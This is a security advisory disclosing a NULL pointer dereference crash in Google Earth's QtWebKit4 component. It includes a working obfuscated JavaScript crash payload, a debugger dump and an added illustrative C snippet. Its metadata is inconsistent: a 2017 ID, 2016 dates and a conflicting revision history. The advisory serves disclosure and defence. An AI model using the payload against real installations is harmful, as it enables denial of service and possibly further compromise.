2017-010: Google Earth 'QtWebKit4' NULL Pointer Dereference Vulnerability

Original release date: January 20, 2016
Last revised: January 20, 2016
Discovered by: Fabián Cuchietti
Severity: 4/5

BACKGROUND

Google Earth is a virtual globe, map and geographical information program. It was originally called EarthViewer 3D and was created by Keyhole, Inc., a company funded by the Central Intelligence Agency (CIA) and acquired by Google in 2004.

DESCRIPTION

NULL pointer dereference errors are common in C/C++. A pointer is a data type that references a location in memory; once the value at that location is read or written through the pointer, the pointer is said to be dereferenced. The NULL pointer dereference weakness occurs when an application dereferences a pointer that is expected to hold a valid address but is instead equal to NULL.

PROOF OF CONCEPT

1) Open Google Earth

2) My Places

3) Right click> Add> Folder

4) Select a name for your folder

5) Description: Here we insert our payload > OK

Payload:

<script type="text/javascript">
    // Defines repeat() (replacing any native implementation)
    String.prototype.repeat = function( num )
    {return new Array( num + 1 ).join( this );}
    var i=0;
    // Random value spliced into the markup so each fragment differs
    var r=Math.floor(Math.random()*99999)*9*8*9*9*9*9*9*9*9/9*9;
    // Markup fragment assembled from character codes: an <xht:acronym>
    // element carrying an oversized font style and a -moz-binding URL
    var bib=String.fromCharCode(60, 120, 104, 116, 58, 97, 99, 114,
    111, 110, 121, 109, 32, 115, 116, 121, 108, 101, 61, 34, 102, 111,
    110, 116, 58, 49, 48, 48, 48, 48, 48, 37, 32, 102, 105, 120, 101, 100,
    115, 121, 115, 59, 32, 115, 116, 121, 108, 101, 61, 34, 120, 115, 115,
    58, 101, 120, 112, 114, 101, 115, 115, 105, 111, 110, 40, 97, 108, 101,
    114, 116, 40, 49, 41, 41, 34, 32, 32, 45, 109, 111, 122,
    45, 98)+r+String.fromCharCode(105, 110, 100, 105, 110, 103, 58, 117,
    114, 108, 40, 35, 49, 49, 41, 59, 32, 102, 111, 110, 116, 45, 102, 97,
    109, 105, 108, 121, 58, 102, 105, 120, 101, 100, 115, 121, 115, 59, 34,
    62, 49, 32, 49, 60, 47, 120, 104, 116, 58, 97, 99, 114, 111, 110, 121, 109,
    62, 10);
    // Write the fragment roughly ten million times into the description pane
    document.write(bib.repeat(9999999));
</script>
 
6) Click the folder created with the payload

DUMP:

FAULTING_IP:
+89cde
00000000 ??              ???

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00000000
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000008
   Parameter[1]: 00000000
Attempt to execute non-executable address 00000000

PROCESS_NAME:  googleearth.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  00000000

WRITE_ADDRESS:  00000000

FOLLOWUP_IP:
QtWebKit4+89cde
5c9f9cde ??              ???

FAILED_INSTRUCTION_ADDRESS:
+89cde
00000000 ??              ???

FAULTING_THREAD:  00001044

BUGCHECK_STR:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_NULL

PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_NULL

DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT_NULL

LAST_CONTROL_TRANSFER:  from 5c9f9cde to 00000000

STACK_TEXT:
WARNING: Frame IP not in any known module. Following frames may be wrong.
002cafb8 5c9f9cde 002cb05c 5c9b74f1 5e9c7916 0x0
002cafbc 002cb05c 5c9b74f1 5e9c7916 00000000 QtWebKit4+0x89cde
002cafc0 5c9b74f1 5e9c7916 00000000 00000000 0x2cb05c
002cb05c 00000000 00000000 00000000 00000000 QtWebKit4+0x474f1


STACK_COMMAND:  ~0s; .ecxr ; kb

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  qtwebkit4+89cde

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: QtWebKit4

IMAGE_NAME:  QtWebKit4.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  4e010a08

FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_NULL_c0000005_QtWebKit4.dll!Unknown
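The following C example is added here for illustration and is not Google Earth or QtWebKit code; the handler registry, tag names and function names are hypothetical. It models the fault class the dump records (a control transfer to address 0, reported as a non-executable access with Parameter[0] = 8, i.e. a call through a NULL function pointer) next to the check that turns the crash into a reported error.

```c
/* Added illustration, not QtWebKit code: dispatch through a function
 * pointer that may be NULL. The dump above shows exactly this shape:
 * LAST_CONTROL_TRANSFER from 5c9f9cde to 00000000 and an execute fault
 * at 00000000 (ExceptionCode c0000005, Parameter[0] = 8). */
#include <stddef.h>
#include <string.h>

typedef int (*render_fn)(const char *markup, size_t len);

struct renderer {
    const char *tag;
    render_fn   render;   /* NULL when no handler is registered */
};

/* Hypothetical handler: returns the number of bytes it "rendered". */
static int render_acronym(const char *markup, size_t len) {
    (void)markup;
    return (int)len;
}

/* Hypothetical registry; the second entry deliberately has no handler,
 * standing in for a lookup that fails (unsupported element, failed
 * allocation, or any path that leaves the pointer unset). */
static struct renderer registry[] = {
    { "acronym", render_acronym },
    { "unknown", NULL },
};

static render_fn lookup(const char *tag) {
    for (size_t i = 0; i < sizeof registry / sizeof registry[0]; i++)
        if (strcmp(registry[i].tag, tag) == 0)
            return registry[i].render;
    return NULL;   /* not found: the caller must handle this */
}

/* Unchecked pattern: if lookup() yields NULL, the CPU jumps to address 0
 * and the process dies with the SOFTWARE_NX_FAULT_NULL signature. */
int render_unchecked(const char *tag, const char *markup) {
    return lookup(tag)(markup, strlen(markup));
}

/* Checked pattern: never dispatch through a NULL pointer; report instead. */
int render_checked(const char *tag, const char *markup) {
    render_fn fn = lookup(tag);
    if (fn == NULL)
        return -1;   /* unsupported or missing handler */
    return fn(markup, strlen(markup));
}
```

Only the checked variant is safe to call with an unregistered tag; the unchecked one is kept solely to show the shape of the faulting code.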

BUSINESS IMPACT

In most cases, NULL pointer dereference errors result in a crash of the application; however, remote code execution is possible under certain circumstances. Depending on the privileges of the application, this weakness can result in a denial of service against the entire system or can be used to gain complete control over it.

SOLUTION

-

REVISION HISTORY

December 13, 2015 Initial release.

DISCLOSURE TIMELINE

  • December 13, 2015   Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
  • December 13, 2015   Contact with Google Security Team.
  • December 14, 2015   Vendor Response/Feedback.
  • January  20, 2016   Advisory published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain- and Colombia-based company and a leader in web application testing, network security, penetration testing, and security compliance implementation and assessment. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are a vendor-independent provider with deep expertise since 2001. Our R&D efforts include vulnerability research, collaboration on open security projects and whitepapers, presentations, and participation in and promotion of security events. For further information regarding our security services, contact us.